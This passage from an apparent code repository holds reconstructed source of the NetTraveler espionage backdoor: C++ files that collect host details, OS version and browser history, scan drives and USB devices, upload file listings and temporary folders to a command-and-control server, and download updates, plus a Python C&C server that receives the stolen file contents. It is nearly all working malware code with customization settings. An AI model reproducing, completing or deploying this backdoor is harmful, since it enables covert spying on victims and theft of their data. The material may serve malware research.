NULL; 23 | lpWndClass.lpszMenuName = NULL; 24 | lpWndClass.lpszClassName = "NTMainWndClass"; 25 | 26 | if (NULL == RegisterClass(&lpWndClass)) 27 | return 0; 28 | 29 | HWND hWindow = CreateWindowEx(0, "NTMainWndClass", NULL, WS_POPUP, 0, 0, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, NULL, NULL); 30 | if (NULL == hWindow) 31 | return 0; 32 | 33 | ShowWindow(hWindow, 0); 34 | UpdateWindow(hWindow); 35 | 36 | struct tagMSG tMsg; 37 | HWND hWnd = NULL; 38 | DWORD dwMsgFilterMin = 0; 39 | DWORD dwMsgFilterMax = 0; 40 | while (1) 41 | { 42 | BOOL bRet = GetMessage(&tMsg, hWnd, dwMsgFilterMin, dwMsgFilterMax); 43 | if (FALSE == bRet || -1 == bRet) 44 | break; 45 | 46 | TranslateMessage(&tMsg); 47 | DispatchMessage(&tMsg); 48 | 49 | if (TRUE == g_bUninstall) 50 | break; 51 | 52 | dwMsgFilterMax = 0; 53 | dwMsgFilterMin = 0; 54 | hWnd = NULL; 55 | } 56 | 57 | return 0; 58 | } 59 | 60 | LRESULT WaitForDeviceToConnect(HWND hWnd, UINT nMsg, WPARAM wParam, LPARAM lParam) 61 | { 62 | if (nMsg != WM_DEVICECHANGE || wParam != DBT_DEVICEARRIVAL) 63 | return DefWindowProc(hWnd, nMsg, wParam, lParam); 64 | 65 | DEV_BROADCAST_VOLUME *lpDevParam = reinterpret_cast(lParam); 66 | if (lpDevParam->dbcv_devicetype != DBT_DEVTYP_VOLUME) 67 | return DefWindowProc(hWnd, nMsg, wParam, lParam); 68 | 69 | const char *lpszSearchType; 70 | if (lpDevParam->dbcv_flags & DBTF_MEDIA) 71 | lpszSearchType = "GSearch"; 72 | else 73 | lpszSearchType = "USearch"; 74 | 75 | CHAR szEnabled[16]; 76 | GetPrivateProfileString("Other", lpszSearchType, "True", szEnabled, sizeof(szEnabled), g_szDNList); 77 | 78 | if (!_stricmp(szEnabled, "True")) 79 | { 80 | BYTE bUnit = ConvertUnitMaskToUnitByte(lpDevParam->dbcv_unitmask); 81 | 82 | char szUnit[16]; 83 | sprintf(szUnit, "%c:\\", bUnit); 84 | 85 | ScanDevice(szUnit); 86 | } 87 | 88 | return DefWindowProc(hWnd, nMsg, wParam, lParam); 89 | } 90 | 91 | BYTE ConvertUnitMaskToUnitByte(DWORD dwMask) 92 | { 93 | BYTE i; 94 | 95 | for(i = 0; !(dwMask & 1) && (i < 26); dwMask >>= 1, i++); 96 | return i + 'A'; 97 | } 98 | -------------------------------------------------------------------------------- /open-backdoor/StdAfx.hpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #include 6 | 7 | // ======= [BEGIN EASY COSTUMIZATION] ======= 8 | #define TRAVNET_MUTEX_NAME "XXXXX2011 Is Running!" 9 | 10 | #define TRAVNET_UPDATE_FILE_NAME_REMOTE "xbox.exe" 11 | #define TRAVNET_UPDATE_FILE_NAME_LOCAL "install.exe" 12 | 13 | //#define NO_HASH_MD5 // Disable MD5 14 | #define NO_CUSTOM_BASE64_ENCODING // Disable encryption 15 | // ======== [END EASY COSTUMIZATION] ======== 16 | 17 | #define _WINSOCK_DEPRECATED_NO_WARNINGS // Keep using gethostbyname() 18 | #pragma warning(disable : 4996) // Keep using GetVersionEx() 19 | 20 | #pragma comment(lib, "Wininet.lib") 21 | #pragma comment(lib, "Ws2_32.lib") 22 | #pragma comment(lib, "Crypt32.lib") 23 | 24 | typedef HANDLE (WINAPI *__tfnCreateToolhelp32Snapshot)(DWORD, DWORD); 25 | 26 | #define LOG(str) WriteLog((str), strlen(str)); 27 | 28 | // --------------- BEGIN DEFINED --------------- 29 | extern DWORD g_dwMaxFileSizeKB; 30 | extern BOOL g_bUseTypeLimit; 31 | extern BOOL g_bUTypeLimit; 32 | // --------------- END DEFINED --------------- 33 | 34 | // --------------- BEGIN NOT DEFINED --------------- 35 | extern CHAR g_nProxy_IP__TEST[32]; 36 | extern CHAR g_nProxy_PORT__TEST[32]; 37 | extern CHAR g_nProxy_USER__TEST[32]; 38 | extern CHAR g_nProxy_PSW__TEST[192]; 39 | 40 | extern CHAR g_szTmpPath[260]; 41 | extern CHAR g_szUDIdx[260]; 42 | extern CHAR g_szUEnumFS[260]; 43 | extern CHAR g_szAcceptedFileTypes[324]; 44 | 45 | extern DWORD g_dwServiceStatus; 46 | extern SERVICE_STATUS_HANDLE g_hServiceStatus; 47 | 48 | extern CHAR g_szVolumeSerialNr[260]; 49 | extern CHAR g_szHostByName[16]; 50 | extern CHAR g_szHostname[260]; 51 | 52 | extern DWORD g_nProxy_UNK; 53 | extern CHAR g_nProxy_IP[260]; 54 | extern CHAR g_nProxy_PORT[8]; 55 | extern CHAR g_nProxy_USER[32]; 56 | extern CHAR g_nProxy_PSW[32]; 57 | 58 | extern char g_szEnumFS[260]; 59 | extern char g_szDNList[260]; 60 | extern char g_szStat_T[260]; 61 | extern char g_szSysDir[260]; 62 | 63 | extern DWORD g_nUploadRate; 64 | extern DWORD g_nDownCmdTime; 65 | 66 | extern CHAR g_szWebPage[264]; 67 | 68 | extern DWORD g_dwScannedFile2; 69 | 70 | extern BOOL g_bUseProxy; 71 | 72 | extern DWORD g_nSentData; 73 | extern DWORD g_dwLastTickCount; 74 | 75 | extern HANDLE g_hMutex; 76 | 77 | extern HANDLE g_lpThread1; 78 | extern DWORD g_dwThreadId1; 79 | 80 | extern HINSTANCE g_hInst; 81 | 82 | extern BOOL g_bUAuto; 83 | extern DWORD g_dwScannedFile; 84 | extern BOOL g_bUninstall; 85 | 86 | extern HANDLE g_lpThread2; 87 | extern DWORD g_dwThreadId2; 88 | 89 | extern CHAR g_szModuleLogName[260]; 90 | extern CHAR g_szTestURL[260]; 91 | 92 | extern DWORD g_bAutoCheck; 93 | extern BOOL g_bCheckedSuccess; 94 | 95 | extern CHAR g_szBlank[4]; // This makes no sense, if the variable is not defined it could have any value 96 | 97 | extern CHAR g_szLastHashMD5[72]; 98 | // --------------- END NOT DEFINED --------------- -------------------------------------------------------------------------------- /open-backdoor/core.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #include "core.hpp" 6 | 7 | #include 8 | #include "StdAfx.hpp" 9 | #include "network_info.hpp" 10 | #include "setup.hpp" 11 | #include "config.hpp" 12 | #include "c2.hpp" 13 | #include "EnumFS.hpp" 14 | #include "recursive.hpp" 15 | 16 | DWORD __stdcall g_fnThread1(LPVOID lpThreadParameter) 17 | { 18 | // --------------- GET GENERAL INFO --------------- 19 | GetHostInfo(g_szHostname, 260, g_szHostByName); 20 | GetVolumeSerialNumber(g_szVolumeSerialNr, 260); 21 | 22 | DWORD nWaitTime = 60000 * g_nDownCmdTime; 23 | DWORD nTimeEnd = 0; 24 | 25 | char szSysDir[260]; 26 | char szSystem_T[260]; 27 | 28 | GetSystemDirectory(szSysDir, 260); 29 | sprintf(szSystem_T, "%s\\system_t.dll", szSysDir); 30 | 31 | GetSystemTechnicalInfo(); 32 | GetProcessList(); 33 | GetNetworkInfo(); 34 | 35 | // --------------- SYSTEM_T.DLL --------------- 36 | SYSTEMTIME lpSysTime; 37 | GetLocalTime(&lpSysTime); 38 | 39 | char szTravLibPath[260]; 40 | sprintf(szTravLibPath, 41 | "travlerbackinfo-%d-%d-%d-%d-%d.dll", 42 | lpSysTime.wYear, 43 | lpSysTime.wMonth, 44 | lpSysTime.wDay, 45 | lpSysTime.wHour, 46 | lpSysTime.wMinute 47 | ); 48 | 49 | LoadProxyConfig(); 50 | if (TRUE == SendFileToC2(szSystem_T, szTravLibPath)) 51 | { 52 | Sleep(10); 53 | DeleteFile(szSystem_T); 54 | } 55 | 56 | // --------------- MAIN ROUTINE --------------- 57 | while (1) 58 | { 59 | LoadProxyConfig(); 60 | 61 | DWORD nTimeBegin = GetTickCount(); 62 | if (nTimeBegin < nTimeEnd) 63 | nTimeEnd = 0; 64 | 65 | if (nTimeBegin - nTimeEnd >= nWaitTime && GetCMDFromC2() && SendCMDRecvToC2()) 66 | { 67 | DeleteFile(g_szDNList); 68 | if (TRUE == PropagateConfig()) 69 | { 70 | DeleteFile(g_szStat_T); 71 | LoadProxyConfig(); 72 | } 73 | 74 | nTimeEnd = GetTickCount(); 75 | } 76 | 77 | GenerateEnumFS(); 78 | if (TRUE == SendEnumFSToC2()) 79 | DeleteFile(g_szEnumFS); 80 | 81 | SendDNListFilesToC2(); 82 | if (TRUE == SendUEnumFSToC2()) 83 | DeleteFile(g_szUEnumFS); 84 | 85 | SendTmpFolderToC2(); 86 | 87 | int nTask = GetTaskFromC2(); 88 | if (nTask == TASK_UNINSTALL) 89 | { 90 | break; 91 | } 92 | else if (nTask == TASK_UPDATE) 93 | { 94 | RemoveALL(); 95 | TaskUpdate(); 96 | } 97 | else if (nTask == TASK_RESET) 98 | { 99 | TaskReset(); 100 | } 101 | else if (nTask == TASK_UPLOAD) 102 | { 103 | TaskUpdate(); 104 | } 105 | 106 | Sleep(60000); 107 | } 108 | 109 | // --------------- EXIT ROUTINE --------------- 110 | while (FALSE == RemoveALL()) 111 | Sleep(60000); 112 | 113 | HeapFree(GetProcessHeap(), 0, NULL); 114 | 115 | char szReqURL[260]; 116 | sprintf(szReqURL, "%s", g_szWebPage); 117 | strcat(szReqURL, "?action=updated&hostid="); 118 | strcat(szReqURL, g_szVolumeSerialNr); 119 | 120 | DWORD dwSize = 0; 121 | HeapFree(GetProcessHeap(), 0, GetFromURL(szReqURL, &dwSize)); 122 | 123 | g_bUninstall = TRUE; 124 | 125 | return 0; 126 | } 127 | 128 | void TaskReset() 129 | { 130 | DeleteFile(g_szEnumFS); 131 | DeleteFile(g_szDNList); 132 | DeleteFile(g_szUDIdx); 133 | DeleteFile(g_szUEnumFS); 134 | DeleteFile(g_szStat_T); 135 | 136 | char szURL[260]; 137 | sprintf(szURL, "%s", g_szWebPage); 138 | strcat(szURL, "?action=updated&hostid="); 139 | strcat(szURL, g_szVolumeSerialNr); 140 | 141 | DWORD dwSize; 142 | HeapFree(GetProcessHeap(), 0, GetFromURL(szURL, &dwSize)); 143 | } -------------------------------------------------------------------------------- /open-command-and-control/nettraveller_server.py: -------------------------------------------------------------------------------- 1 | ################################################################################ 2 | ## Copyright 2015 Christian Roggia. All rights reserved. ## 3 | ## Use of this source code is governed by an Apache 2.0 license that can be ## 4 | ## found in the LICENSE file. ## 5 | ################################################################################ 6 | 7 | from http.server import BaseHTTPRequestHandler, HTTPServer 8 | 9 | PORT_NUMBER = 8000 10 | 11 | class CCRequestHandler(BaseHTTPRequestHandler): 12 | def do_GET(self): 13 | if self.path == "/?action=getdata": 14 | self.send_response(200) 15 | self.send_header('Content-type','text/html') 16 | self.end_headers() 17 | 18 | self.wfile.write(bytes("XXXXXXXX:UPLOAD", 'utf-8')) 19 | elif self.path == "/?action=datasize": 20 | self.send_response(200) 21 | self.send_header('Content-type','text/html') 22 | self.end_headers() 23 | 24 | self.wfile.write(bytes("Success:XXXXXX", 'utf-8')) 25 | #self.wfile.write("Success:0") 26 | elif self.path == "/../xbox.exe" or self.path == "/xbox.exe": 27 | self.send_response(200) 28 | self.send_header('Content-type','application/x-msdownload') 29 | self.end_headers() 30 | 31 | f = open("update.exe", "rb") 32 | self.wfile.write(bytes(f.read(), 'utf-8')) 33 | f.close() 34 | elif self.path == "/?action=updated&hostid=XXXXXXXX": 35 | self.send_response(200) 36 | self.send_header('Content-type','text/html') 37 | self.end_headers() 38 | 39 | self.wfile.write(bytes("", 'utf-8')) 40 | elif self.path == "/?action=getcmd&hostid=XXXXXXXX&hostname=XXXX": 41 | self.send_response(200) 42 | self.send_header('Content-type','text/html') 43 | self.end_headers() 44 | 45 | self.wfile.write(bytes("[CmdBegin]\r\nTEST CONFIG\r\n[CmdEnd]\r\n", 'utf-8')) 46 | elif self.path == "/?action=gotcmd&hostid=XXXXXXXX&hostname=XXXX": 47 | self.send_response(200) 48 | self.send_header('Content-type','text/html') 49 | self.end_headers() 50 | 51 | self.wfile.write(bytes("Success", 'utf-8')) 52 | elif self.path[:43] == "/?hostid=XXXXXXXX&hostname=XXXX&hostip=": 53 | self.send_response(200) 54 | self.send_header('Content-type','text/html') 55 | self.end_headers() 56 | 57 | sent_filename = "" 58 | sent_filestart = -1 59 | sent_filetext = "" 60 | 61 | url_args = (self.path[2:]).split("&") 62 | for i in url_args: 63 | if i[:9] == "filename=": 64 | sent_filename = i[9:] 65 | elif i[:10] == "filestart=": 66 | sent_filestart = int(i[10:]) 67 | elif i[:9] == "filetext=": 68 | sent_filetext = i[9:] 69 | 70 | if sent_filename == "" or sent_filestart == -1 or sent_filetext == "": 71 | self.wfile.write(bytes("Success:0", 'utf-8')) 72 | 73 | f = open(sent_filename, "a") 74 | f.write(sent_filetext) 75 | f.close() 76 | 77 | self.wfile.write(bytes("Success:%d" % (sent_filestart + 1024), 'utf-8')) 78 | else: 79 | self.send_response(404) 80 | self.send_header('Content-type','text/html') 81 | self.end_headers() 82 | 83 | self.wfile.write(bytes("404: Not found.", 'utf-8')) 84 | 85 | if __name__ == "__main__": 86 | os.system('cls') 87 | 88 | # NOTE: This is only an example, no real functionality is provided 89 | server = HTTPServer(('127.0.0.1', PORT_NUMBER), CCRequestHandler) 90 | print('Started [NetTraveler C&C] on port %u' % PORT_NUMBER) 91 | 92 | server.serve_forever() -------------------------------------------------------------------------------- /open-backdoor/IEHistory.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #include "IEHistory.hpp" 6 | 7 | #include 8 | 9 | IEHistory::IEHistory(void) 10 | { 11 | char szIE_HistoryIndex[260] = {}; 12 | 13 | m_lpHistoryMapView = NULL; 14 | m_dwHistorySize = 0; 15 | 16 | HKEY hKey; 17 | if (!RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", 0, KEY_EXECUTE, &hKey)) 18 | { 19 | DWORD dwSize = 260; 20 | 21 | RegQueryValueEx(hKey, "History", NULL, NULL, (LPBYTE)szIE_HistoryIndex, &dwSize); 22 | RegCloseKey(hKey); 23 | } 24 | 25 | strcat(szIE_HistoryIndex, "\\History.IE5\\index.dat"); 26 | m_lpHistoryMapView = Initialize(szIE_HistoryIndex); 27 | } 28 | 29 | IEHistory::~IEHistory() 30 | { 31 | if (NULL != m_lpHistoryMapView) 32 | UnmapViewOfFile(m_lpHistoryMapView); 33 | } 34 | 35 | HANDLE IEHistory::Initialize(LPCSTR lpszFileName) 36 | { 37 | HANDLE hFile = CreateFile(lpszFileName, 38 | GENERIC_READ, 39 | FILE_SHARE_READ | FILE_SHARE_WRITE, 40 | NULL, 41 | OPEN_EXISTING, 42 | FILE_ATTRIBUTE_NORMAL, 43 | NULL 44 | ); 45 | if (INVALID_HANDLE_VALUE == hFile) 46 | return NULL; 47 | 48 | HANDLE hMap = CreateFileMapping(hFile, NULL, PAGE_READONLY, 0, 0, "MappingCache"); 49 | if (NULL == hMap) 50 | return NULL; 51 | 52 | m_lpHistoryMapView = MapViewOfFile(hMap, FILE_MAP_READ, 0, 0, 0); 53 | if (NULL == m_lpHistoryMapView) 54 | return NULL; 55 | 56 | m_dwHistorySize = *(DWORD *)((char*)m_lpHistoryMapView + 28); 57 | 58 | return m_lpHistoryMapView; 59 | } 60 | 61 | BOOL sub_10001264(void *lpMem, char *szPool, DWORD dwSize) 62 | { 63 | const char *v3; // esi@3 64 | const char *v5; // esi@5 65 | size_t v6; // eax@6 66 | 67 | if (!memcmp(lpMem, "URL ", 4) && *((DWORD *)lpMem + 1) > 0 && (v3 = strstr((const char *)lpMem + 104, "@")) != 0) 68 | { 69 | v5 = v3 + 1; 70 | 71 | if (strlen(v5) + 1 >= dwSize - 1) 72 | v6 = dwSize - 1; 73 | else 74 | v6 = strlen(v5) + 1; 75 | 76 | memcpy(szPool, v5, v6); 77 | 78 | return TRUE; 79 | } 80 | 81 | return FALSE; 82 | } 83 | 84 | int IEHistory::GetHistory(WCHAR **lpszPool) 85 | { 86 | if (NULL == m_lpHistoryMapView || 0 == m_dwHistorySize) 87 | return -1; 88 | 89 | DWORD lpHashRecord = *(DWORD *)((char*)m_lpHistoryMapView + 32); 90 | if (lpHashRecord == 0 || lpHashRecord > m_dwHistorySize) 91 | return -1; 92 | 93 | DWORD dwNext; 94 | DWORD k = 0; 95 | for (HASH_RECORD_HEADER *i = (HASH_RECORD_HEADER *)((char*)m_lpHistoryMapView + lpHashRecord); ; i = (HASH_RECORD_HEADER *)((char*)m_lpHistoryMapView + dwNext)) 96 | { 97 | if (memcmp(i->szSignature, "HASH", 4)) 98 | break; 99 | 100 | DWORD v7 = i->dwBlockCount; 101 | dwNext = i->dwNextRecord; 102 | 103 | HASH_RECORD_BLOCK *v9 = reinterpret_cast(i + sizeof(HASH_RECORD_HEADER)); 104 | WCHAR **v10 = &lpszPool[k]; 105 | 106 | for (DWORD j = 0; j < 16 * v7; j++, v9++) 107 | { 108 | if (v9->dwUnknown == 0) 109 | break; 110 | 111 | if (v9->dwUnknown != 3) 112 | { 113 | if (v9->dwURLAddr && v9->dwURLAddr != 3 && v9->dwURLAddr < m_dwHistorySize) 114 | { 115 | char szURL[1024] = {}; 116 | if (sub_10001264((char*)m_lpHistoryMapView + v9->dwURLAddr, szURL, 1024)) 117 | { 118 | char *lpszBuf1 = strchr(szURL, '?'); 119 | if (NULL != lpszBuf1) 120 | *lpszBuf1 = 0; 121 | 122 | char *lpszBuf2 = strchr(szURL, '/'); 123 | if (NULL != lpszBuf2) 124 | { 125 | char *lpszBuf3 = strrchr(szURL, '/'); 126 | if (NULL != lpszBuf3) 127 | { 128 | if (lpszBuf3 - lpszBuf2 == 1) 129 | strcat(szURL, "/"); 130 | } 131 | } 132 | 133 | *v10 = new WCHAR[strlen(szURL) + 1]; 134 | mbstowcs(*v10, szURL, strlen(szURL) + 1); 135 | 136 | ++k; 137 | ++v10; 138 | } 139 | } 140 | 141 | if (k >= 4999) 142 | return k; 143 | } 144 | } 145 | 146 | if (k < 4999) 147 | { 148 | if (dwNext && dwNext <= m_dwHistorySize) 149 | continue; 150 | } 151 | } 152 | 153 | return k; 154 | } -------------------------------------------------------------------------------- /open-backdoor/3rd-party/base64.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2003 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_LICENSE_HEADER_START@ 5 | * 6 | * Copyright (c) 1999-2003 Apple Computer, Inc. All Rights Reserved. 7 | * 8 | * This file contains Original Code and/or Modifications of Original Code 9 | * as defined in and that are subject to the Apple Public Source License 10 | * Version 2.0 (the 'License'). You may not use this file except in 11 | * compliance with the License. Please obtain a copy of the License at 12 | * http://www.opensource.apple.com/apsl/ and read it before using this 13 | * file. 14 | * 15 | * The Original Code and all software distributed under the License are 16 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 17 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 18 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 19 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 20 | * Please see the License for the specific language governing rights and 21 | * limitations under the License. 22 | * 23 | * @APPLE_LICENSE_HEADER_END@ 24 | */ 25 | /* ==================================================================== 26 | * Copyright (c) 1995-1999 The Apache Group. All rights reserved. 27 | * 28 | * Redistribution and use in source and binary forms, with or without 29 | * modification, are permitted provided that the following conditions 30 | * are met: 31 | * 32 | * 1. Redistributions of source code must retain the above copyright 33 | * notice, this list of conditions and the following disclaimer. 34 | * 35 | * 2. Redistributions in binary form must reproduce the above copyright 36 | * notice, this list of conditions and the following disclaimer in 37 | * the documentation and/or other materials provided with the 38 | * distribution. 39 | * 40 | * 3. All advertising materials mentioning features or use of this 41 | * software must display the following acknowledgment: 42 | * "This product includes software developed by the Apache Group 43 | * for use in the Apache HTTP server project (http://www.apache.org/)." 44 | * 45 | * 4. The names "Apache Server" and "Apache Group" must not be used to 46 | * endorse or promote products derived from this software without 47 | * prior written permission. For written permission, please contact 48 | * apache@apache.org. 49 | * 50 | * 5. Products derived from this software may not be called "Apache" 51 | * nor may "Apache" appear in their names without prior written 52 | * permission of the Apache Group. 53 | * 54 | * 6. Redistributions of any form whatsoever must retain the following 55 | * acknowledgment: 56 | * "This product includes software developed by the Apache Group 57 | * for use in the Apache HTTP server project (http://www.apache.org/)." 58 | * 59 | * THIS SOFTWARE IS PROVIDED BY THE APACHE GROUP ``AS IS'' AND ANY 60 | * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 61 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 62 | * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE APACHE GROUP OR 63 | * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 64 | * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 65 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 66 | * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 67 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 68 | * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 69 | * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED 70 | * OF THE POSSIBILITY OF SUCH DAMAGE. 71 | * ==================================================================== 72 | * 73 | * This software consists of voluntary contributions made by many 74 | * individuals on behalf of the Apache Group and was originally based 75 | * on public domain software written at the National Center for 76 | * Supercomputing Applications, University of Illinois, Urbana-Champaign. 77 | * For more information on the Apache Group and the Apache HTTP server 78 | * project, please see . 79 | * 80 | */ 81 | 82 | 83 | 84 | #ifndef _BASE64_H_ 85 | #define _BASE64_H_ 86 | 87 | #ifdef __cplusplus 88 | extern "C" { 89 | #endif 90 | 91 | int Base64encode_len(int len); 92 | int Base64encode(char * coded_dst, const char *plain_src,int len_plain_src); 93 | 94 | int Base64decode_len(const char * coded_src); 95 | int Base64decode(char * plain_dst, const char *coded_src); 96 | 97 | #ifdef __cplusplus 98 | } 99 | #endif 100 | 101 | #endif //_BASE64_H_ 102 | -------------------------------------------------------------------------------- /open-backdoor/system_info.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #include "system_info.hpp" 6 | 7 | #include 8 | #include 9 | #include "StdAfx.hpp" 10 | #include "setup.hpp" 11 | #include "IEHistory.hpp" 12 | 13 | void GetProgramFiles() 14 | { 15 | CHAR szProgramFiles[260] = {}; 16 | 17 | if (FALSE == SHGetSpecialFolderPath(NULL, szProgramFiles, CSIDL_PROGRAM_FILES, TRUE)) 18 | return; 19 | 20 | strcat(szProgramFiles, "\\"); 21 | GetProgramFilesEx(szProgramFiles); 22 | } 23 | 24 | void GetIEHistory() 25 | { 26 | CHAR szBuf[10240]; 27 | WCHAR *szPool[512] = {}; 28 | 29 | IEHistory pkHistory; 30 | int nCount = pkHistory.GetHistory(szPool); 31 | 32 | LOG("\r\n\r\n///////////////////////////////////////////////\r\n\r\n"); 33 | LOG("\r\nIE History:\r\n"); 34 | 35 | if (nCount > 0) 36 | { 37 | WCHAR **lpszPool = szPool; 38 | for (int i = nCount; i > 0; i--, lpszPool++) 39 | { 40 | sprintf(szBuf, "%S", *lpszPool); 41 | 42 | LOG(szBuf); 43 | LOG("\r\n"); 44 | } 45 | 46 | for (lpszPool = szPool; nCount > 0; nCount--, lpszPool++) 47 | delete *lpszPool; 48 | } 49 | } 50 | 51 | void GetOSVersion() 52 | { 53 | CHAR szLog[260] = {}; 54 | strcat(szLog, "OSVersion: "); 55 | 56 | OSVERSIONINFO osInfo = {}; 57 | osInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); 58 | 59 | if (FALSE == GetVersionEx(&osInfo)) 60 | return; 61 | 62 | if (osInfo.dwPlatformId == 1) 63 | { 64 | if (osInfo.dwMajorVersion == 4) 65 | { 66 | if (osInfo.dwMinorVersion == 0) 67 | { 68 | strcat(szLog, "Microsoft Windows 95 "); 69 | 70 | if (osInfo.szCSDVersion[1] == 'C' || osInfo.szCSDVersion[1] == 'B') 71 | strcat(szLog, "OSR2 "); 72 | } 73 | else if (osInfo.dwMinorVersion == 10) 74 | { 75 | strcat(szLog, "Microsoft Windows 98 "); 76 | 77 | if (osInfo.szCSDVersion[1] == 'A') 78 | strcat(szLog, "SE "); 79 | } 80 | else if (osInfo.dwMinorVersion == 90) 81 | { 82 | strcat(szLog, "Microsoft Windows Millennium Edition "); 83 | } 84 | } 85 | } 86 | else if(osInfo.dwPlatformId == 2) 87 | { 88 | if (osInfo.dwMajorVersion <= 4) 89 | { 90 | strcat(szLog, "Microsoft Windows NT "); 91 | } 92 | else if (osInfo.dwMajorVersion == 5) 93 | { 94 | if (osInfo.dwMinorVersion == 0) 95 | strcat(szLog, "Microsoft Windows 2000 "); 96 | else if (osInfo.dwMinorVersion == 1) 97 | strcat(szLog, "Microsoft Windows XP "); 98 | else if (osInfo.dwMinorVersion == 2) 99 | strcat(szLog, "Microsoft Windows 2003 "); 100 | } 101 | else if (osInfo.dwMajorVersion == 6) 102 | { 103 | if (osInfo.dwMinorVersion == 0) 104 | strcat(szLog, "Microsoft Windows Vista "); 105 | else if (osInfo.dwMinorVersion == 1) 106 | strcat(szLog, "Microsoft Windows7 "); 107 | else if (osInfo.dwMinorVersion == 2) 108 | strcat(szLog, "Microsoft Windows8 "); 109 | } 110 | 111 | CHAR szProductType[80]; 112 | DWORD cbData; // Check this, shouldn't it be the size of szProductType? 113 | HKEY hKey; 114 | 115 | RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\ProductOptions", 0, 1, &hKey); 116 | RegQueryValueEx(hKey, "ProductType", NULL, NULL, (LPBYTE)szProductType, &cbData); 117 | RegCloseKey(hKey); 118 | 119 | if (!lstrcmpi("WINNT", szProductType)) 120 | strcat(szLog, "Professional, "); 121 | 122 | if (!lstrcmpi("LANMANNT", szProductType)) 123 | strcat(szLog, "Server, "); 124 | 125 | if (!lstrcmpi("SERVERNT", szProductType)) 126 | strcat(szLog, "Advanced Server, "); 127 | 128 | CHAR szBuild[256]; 129 | if (osInfo.dwMajorVersion > 4) 130 | { 131 | sprintf(szBuild, "%s (Build %d)\n", osInfo.szCSDVersion, (WORD)osInfo.dwBuildNumber); 132 | strcat(szLog, szBuild); 133 | } 134 | else 135 | { 136 | sprintf(szBuild, 137 | "version %d.%d %s (Build %d)\n", 138 | osInfo.dwMajorVersion, 139 | osInfo.dwMinorVersion, 140 | osInfo.szCSDVersion, 141 | (WORD)osInfo.dwBuildNumber 142 | ); 143 | 144 | strcat(szLog, szBuild); 145 | } 146 | } 147 | 148 | LOG("\r\n\r\n///////////////////////////////////////////////\r\n\r\n"); 149 | LOG(szLog); 150 | } 151 | 152 | void GetIEVersion() 153 | { 154 | CHAR Buffer[260] = {}; 155 | strcat(Buffer, "IEVersion: Internet Explorer "); 156 | 157 | HKEY hKey; 158 | if (ERROR_SUCCESS == RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Internet Explorer", 0, KEY_QUERY_VALUE , &hKey)) 159 | { 160 | char Source[260] = {}; 161 | DWORD dwSize = 260; 162 | 163 | if (ERROR_SUCCESS == RegQueryValueEx(hKey, "Version", NULL, NULL, (LPBYTE)Source, &dwSize)) 164 | { 165 | LOG("\r\n\r\n///////////////////////////////////////////////\r\n\r\n"); 166 | 167 | strcat(Buffer, Source); 168 | LOG(Buffer); 169 | } 170 | } 171 | 172 | RegCloseKey(hKey); 173 | } -------------------------------------------------------------------------------- /open-backdoor/EnumFS.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #include "EnumFS.hpp" 6 | 7 | #include "StdAfx.hpp" 8 | 9 | // If ScanAll is True the function scans all the volumes (FIXED and REMOTE) 10 | // If ScanAll is False the function scans only the directories in ScanList 11 | BOOL GenerateEnumFS() 12 | { 13 | CHAR szNowTime[20] = {}; 14 | CHAR szLastScanTime[16] = {}; 15 | 16 | g_dwScannedFile2 = 0; 17 | 18 | CHAR szScanAll[260]; 19 | GetPrivateProfileString("ScanList", "ScanAll", "False", szScanAll, 256, g_szDNList); 20 | 21 | SYSTEMTIME lpSystemTime; 22 | if (_stricmp(szScanAll, "True")) 23 | { 24 | GetLocalTime(&lpSystemTime); 25 | sprintf(szNowTime, "%04u-%02u-%02u", lpSystemTime.wYear, lpSystemTime.wMonth, lpSystemTime.wDay); 26 | 27 | GetPrivateProfileString("EnumTime", "DateTime", g_szBlank, szLastScanTime, 16, g_szDNList); 28 | if (!strcmp(szNowTime, szLastScanTime)) 29 | return FALSE; 30 | 31 | FILE *f = fopen(g_szEnumFS, "w"); 32 | if (NULL == f) 33 | return FALSE; 34 | 35 | CHAR szLog[292]; 36 